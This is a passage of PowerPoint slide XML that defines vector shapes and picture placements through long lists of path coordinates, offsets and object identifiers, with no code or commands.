                    <a:pt x="708099" y="46329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="710677" y="46532"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="712160" y="46776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="713212" y="47142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="715025" y="47142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="715025" y="46329"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="715645" h="120650">
                  <a:moveTo>
                    <a:pt x="715025" y="26293"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="705708" y="26293"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="703626" y="26720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="696514" y="29423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="692348" y="32166"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="687532" y="36291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="715025" y="36291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="715025" y="26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D800EEA3-8D4F-41F3-813C-2AF569FC65C5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6754365" y="4045118"/>
              <a:ext cx="979805" cy="478155"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="979804" h="478154">
                  <a:moveTo>
                    <a:pt x="639009" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="102824"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="340228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="340704" y="477832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="979714" y="370471"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="979714" y="128530"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="639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6F4B85E0-A59D-CBAD-34B8-FD721220F6A6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7096584" y="4172137"/>
              <a:ext cx="639445" cy="351155"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="639445" h="351154">
                  <a:moveTo>
                    <a:pt x="635981" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="102824"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="350813"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="99939" y="332667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="319504" y="294864"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="537555" y="257061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="610239" y="244964"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="629924" y="243452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="639009" y="243452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="635981" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="E8EBE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4" name="object 40">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29E985E3-1A68-271E-2C30-8B5BCB8949A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54365" y="4046630"/>
              <a:ext cx="970628" cy="476320"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="45" name="object 41">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F557047-D94D-2F45-5029-B6F04C722CE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46037" y="3514946"/>
              <a:ext cx="1400663" cy="1160244"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="46" name="object 42">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02CB7301-5FEA-CC6B-4B3C-5E853BF02CF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45039" y="3648941"/>
              <a:ext cx="443672" cy="491441"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="47" name="object 43">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1638C1A4-03F1-7552-1D90-EFD2A4D750A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06943" y="4203892"/>
              <a:ext cx="198365" cy="149700"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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55E9867A-7FFC-4CF2-E5ED-C6ED8BE32ABA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7258608" y="3845517"/>
              <a:ext cx="229235" cy="240665"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="229234" h="240664">
                  <a:moveTo>
                    <a:pt x="158995" y="3024"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="171109" y="7560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="186251" y="12097"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198365" y="16633"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="204422" y="19657"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="208965" y="22681"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="215022" y="25706"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="219564" y="30242"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222593" y="34778"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="225621" y="39315"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227136" y="45363"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228650" y="49900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228650" y="55948"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227136" y="63509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="219564" y="87703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="211993" y="114921"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="202908" y="142139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="196851" y="155749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190794" y="169358"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184737" y="182967"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177166" y="193552"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="169595" y="205649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="162023" y="214722"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="152938" y="223794"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="146881" y="226819"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="143852" y="231355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137795" y="232867"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131738" y="235891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127196" y="237403"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121139" y="238916"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116596" y="238916"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="112053" y="240428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="102968" y="238916"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93882" y="235891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84797" y="232867"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75712" y="229843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66626" y="225306"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51484" y="219258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45427" y="216234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39370" y="213209"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34827" y="210185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30284" y="205649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25742" y="201112"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21199" y="196576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18170" y="192040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13628" y="185991"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10599" y="179943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7571" y="173894"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4542" y="167846"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3028" y="161797"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1514" y="154236"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="148188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="140627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="133067"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="120970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1514" y="110385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4542" y="98288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7571" y="87703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13628" y="77118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18170" y="66533"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24227" y="57460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="31799" y="46875"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39370" y="39315"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48455" y="31754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57541" y="24194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68140" y="18145"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78740" y="12097"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89340" y="7560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="99939" y="3024"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="112053" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124167" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136281" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="146881" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158995" y="3024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9" name="object 45">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{588F808C-52A2-1255-1878-4A29EE291D0D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0092" y="3703378"/>
              <a:ext cx="139310" cy="193552"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="50" name="object 46">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77664B75-F7B7-2930-9A4B-0F5654D3F708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51036" y="3693597"/>
              <a:ext cx="278620" cy="400050"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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7E5820DE-C04C-8B9E-14D5-54DD6AE5D644}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7092054" y="4695475"/>
              <a:ext cx="713105" cy="96520"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="23307" y="4066"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="4066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="94428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23307" y="94428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23307" y="54617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81036" y="54617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81036" y="37138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23307" y="37138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23307" y="4066"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="81036" y="54617"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="57729" y="54617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57729" y="94428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81036" y="94428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81036" y="54617"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="81036" y="4066"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="57729" y="4066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57729" y="37138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81036" y="37138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81036" y="4066"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="168640" y="39325"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="135149" y="39325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139680" y="40042"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145817" y="42915"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147361" y="45514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147361" y="49641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140920" y="50005"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="134722" y="50572"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100869" y="69910"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100925" y="81249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103063" y="86235"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="112001" y="94428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="112296" y="94428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="117227" y="96249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="126432" y="96249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="128972" y="96015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147239" y="87206"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168901" y="87206"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168901" y="81440"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131918" y="81440"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129906" y="81249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127305" y="80483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="126208" y="79887"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125273" y="79081"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124298" y="78274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123688" y="77429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123201" y="75653"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123079" y="70955"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123668" y="69231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147239" y="62445"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168901" y="62445"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168901" y="40042"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168640" y="39325"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="168901" y="87206"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="147239" y="87206"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147239" y="94428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168901" y="94428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168901" y="87206"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="168901" y="62445"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="147239" y="62445"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147239" y="76602"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145532" y="78052"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="143561" y="79223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138767" y="81117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138471" y="81117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136856" y="81440"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168901" y="81440"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168901" y="62445"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="133706" y="24335"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="128484" y="24335"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123282" y="24749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="112878" y="26407"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="109119" y="27127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106823" y="27732"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106823" y="44179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108814" y="44179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="110602" y="43490"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="113528" y="42511"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121456" y="40042"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121226" y="40042"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125558" y="39325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168640" y="39325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="166137" y="33893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="160610" y="30069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="155829" y="27560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="149749" y="25768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142758" y="24749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="143728" y="24749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="133706" y="24335"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="230958" y="24396"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="221144" y="24396"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216145" y="25062"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="186498" y="54274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="186598" y="67179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="215596" y="95540"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221042" y="96249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="231507" y="96249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="235652" y="95773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243130" y="93871"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="246385" y="92709"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250161" y="90968"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250161" y="80651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221713" y="80651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="217161" y="78953"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210740" y="72156"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209135" y="67179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209135" y="54274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210699" y="49247"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216958" y="41842"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221449" y="39991"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250161" y="39991"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250161" y="29858"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="246768" y="28238"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243110" y="26923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="235246" y="24902"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="230958" y="24396"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="250161" y="72338"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="247072" y="72338"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="246178" y="73188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="245223" y="74057"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="230369" y="80651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250161" y="80651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250161" y="72338"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="250161" y="39991"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="229881" y="39991"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232178" y="40286"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236140" y="41458"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="247072" y="48487"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250161" y="48487"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250161" y="39991"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="288708" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="266783" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="266783" y="94428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288708" y="94428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288708" y="72056"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="294601" y="64792"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="319074" y="64792"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="313346" y="56324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288708" y="56324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288708" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="319074" y="64792"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="294601" y="64792"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="313702" y="94428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="339123" y="94428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="319074" y="64792"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="337375" y="26277"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="312178" y="26277"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288708" y="56324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="313346" y="56324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="312889" y="55650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="337375" y="26277"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="386408" y="24152"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="350278" y="45628"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="347698" y="60746"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="348380" y="68783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="372131" y="94024"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="372323" y="94024"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="380387" y="95672"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390045" y="96249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="395349" y="96249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="400185" y="95804"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="408922" y="94024"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="413576" y="92587"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418514" y="90604"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418514" y="80895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="385128" y="80895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="379621" y="79479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="372143" y="73814"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370111" y="69727"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="369786" y="64387"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419794" y="64387"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419794" y="56741"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419511" y="52749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419429" y="51584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="369725" y="51584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370034" y="47012"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370050" y="46768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="371554" y="43269"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="376906" y="38959"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="380434" y="37807"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415345" y="37807"/>
                  </a:lnTo>
